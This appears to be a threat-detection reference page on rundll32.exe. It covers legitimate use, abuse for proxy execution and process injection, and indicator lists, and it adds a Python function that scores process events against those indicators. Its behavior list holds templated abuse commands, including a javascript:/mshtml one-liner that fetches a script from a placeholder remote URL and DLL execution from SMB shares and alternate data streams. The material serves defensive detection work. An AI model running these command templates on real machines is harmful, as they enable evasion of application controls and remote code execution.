Process
rundll32.exe
rundll32.exe is a Windows utility that runs functions exported by DLL files. Because a DLL cannot execute on its own, Windows uses rundll32.exe to call a specific function inside one, which is how many built-in features such as Control Panel applets are launched. That same ability to run arbitrary DLL code makes it one of the most abused binaries on Windows.
File identity
Not observed.
Execution context
Not observed.
Ancestry
Not observed.
Behavior
Not observed.
- rundll32.exe {PATH},EntryPoint · Execute · Execute DLL file
- rundll32.exe {PATH_SMB:.dll},EntryPoint · Execute · Execute DLL from SMB share
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:{REMOTEURL}") · Execute · Execute code from Internet
- rundll32 "{PATH}:ADSDLL.dll",DllMain · ADS · Execute code from alternate data stream
- rundll32.exe -sta {CLSID} · Execute · Execute a DLL/EXE COM server payload or ScriptletURL code
Indicators
Not observed.
Analysis
rundll32.exe loads a DLL and calls one of its exported functions. The command line names the DLL and the entry point, as in rundll32.exe shell32.dll,Control_RunDLL, optionally followed by arguments passed to that function. Windows leans on it constantly: Control Panel applets, printer and display dialogs, and many shell actions are really rundll32 calling an exported function. The genuine binary lives at C:\Windows\System32\rundll32.exe, with a 32-bit copy under SysWOW64.
The function it calls has to be exported by the DLL, and can be named or referenced by ordinal number. Beyond plain DLLs it can reach a few special handlers: it runs Control Panel (.cpl) files, and through the legacy mshtml.dll it can execute inline JavaScript straight from the command line. Its parent is whatever invoked the feature, most often explorer.exe, Control Panel, or another Windows component.
Several rundll32 instances at once are normal on a desktop, each tied to whatever Windows feature started it, short-lived for a dialog and longer-lived for anything that keeps a window open. What rundll32 is doing at any moment is defined entirely by the DLL and entry point on its command line.
rundll32.exe is a top proxy-execution tool (T1218.011). The signed binary will run code from any DLL it is pointed at, which lets an attacker execute a malicious DLL under a trusted, Microsoft-signed process and slip past application-control rules. Path and signature checks pass, so the signals worth reading instead are the DLL path, the entry point, and the parent. A DLL loaded from a user-writable directory, or called by a bare ordinal, deserves a close look.
An empty command line is its own tell. A rundll32.exe running with no DLL or entry point argument is a long-standing sign of process injection, a hollow host spawned only to receive injected code (T1055).
rundll32 is also a fileless execution path. Through the legacy mshtml.dll handler it can run inline JavaScript from the command line (T1059.007), fetching and executing a payload without writing a script to disk. A javascript: string or a reference to RunHTMLApplication in a rundll32 command line is almost never legitimate.
- Image path other than C:\Windows\System32\rundll32.exe or its SysWOW64 copy (high)
- Running with no command-line arguments (no DLL or entry point) (high)
- Loading a DLL from a user-writable path (Temp, AppData, ProgramData, Downloads) (high)
- javascript:, mshtml, or RunHTMLApplication on the command line (high)
- Parent is an Office application, wscript.exe, cscript.exe, or mshta.exe (high)
- Calling an exported function by ordinal from a non-system DLL (med)
- Outbound network connections shortly after launch (med)
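As an added example, not part of this page or of any vendor's detection content, the indicators above turned into a scoring function over process-creation events; the event schema (image, cmdline, parent_image), the sample events and the list of Office and script-host parent names are assumptions constructed for the demonstration.

```python
import re

# Allow-lists and markers taken from the indicator list on this page;
# the parent-process names are an assumption (common Office and script hosts).
GENUINE_IMAGES = {r"c:\windows\system32\rundll32.exe", r"c:\windows\syswow64\rundll32.exe"}
USER_WRITABLE = ("\\temp\\", "\\appdata\\", "\\programdata\\", "\\downloads\\")
SCRIPT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "wscript.exe", "cscript.exe", "mshta.exe"}
FILELESS_MARKERS = ("javascript:", "mshtml", "runhtmlapplication")

def split_rundll32_cmdline(cmdline: str) -> tuple[str, str]:
    """Return (dll, entry_point) from 'rundll32.exe <dll>,<entry> [args]'.
    Both are '' when nothing follows the executable (the injection-host case)."""
    rest = re.sub(r'^\s*(?:"[^"]*"|\S+)\s*', "", cmdline, count=1)  # drop exe token
    m = re.match(r'("[^"]*"\S*|\S+)', rest)  # first argument, quoted path allowed
    if not m:
        return "", ""
    target = m.group(1).replace('"', "")
    dll, sep, entry = target.rpartition(",")
    return (dll, entry) if sep else (target, "")

def score_rundll32_event(event: dict) -> list[tuple[str, str]]:
    """Apply the page's indicators to one process-creation event.
    Constructed event schema: image, cmdline, parent_image (full paths)."""
    findings = []
    dll, entry = split_rundll32_cmdline(event["cmdline"])
    parent = event["parent_image"].lower().rsplit("\\", 1)[-1]
    if event["image"].lower() not in GENUINE_IMAGES:
        findings.append(("high", f"image path not genuine: {event['image']}"))
    if not dll:
        findings.append(("high", "no DLL or entry point (possible injection host)"))
    elif any(p in dll.lower() for p in USER_WRITABLE):
        findings.append(("high", f"DLL from user-writable path: {dll}"))
    if any(mk in event["cmdline"].lower() for mk in FILELESS_MARKERS):
        findings.append(("high", "javascript:/mshtml/RunHTMLApplication on command line"))
    if parent in SCRIPT_PARENTS:
        findings.append(("high", f"suspicious parent: {parent}"))
    if entry.startswith("#") and not dll.lower().startswith("c:\\windows\\"):
        findings.append(("med", f"ordinal entry point {entry} from non-system DLL {dll}"))
    return findings

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "rundll32.exe"},
    {"image": r"C:\Windows\System32\rundll32.exe", "parent_image": r"C:\Office16\WINWORD.EXE",
     "cmdline": r'rundll32.exe "C:\Users\bob\AppData\Local\Temp\x.dll",#1'},
]
```

Running score_rundll32_event over SAMPLE_EVENTS yields no findings for the Control Panel call, one high for the bare rundll32.exe, and two highs plus a med for the Temp DLL called by ordinal under Word.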
Telemetry
Not observed.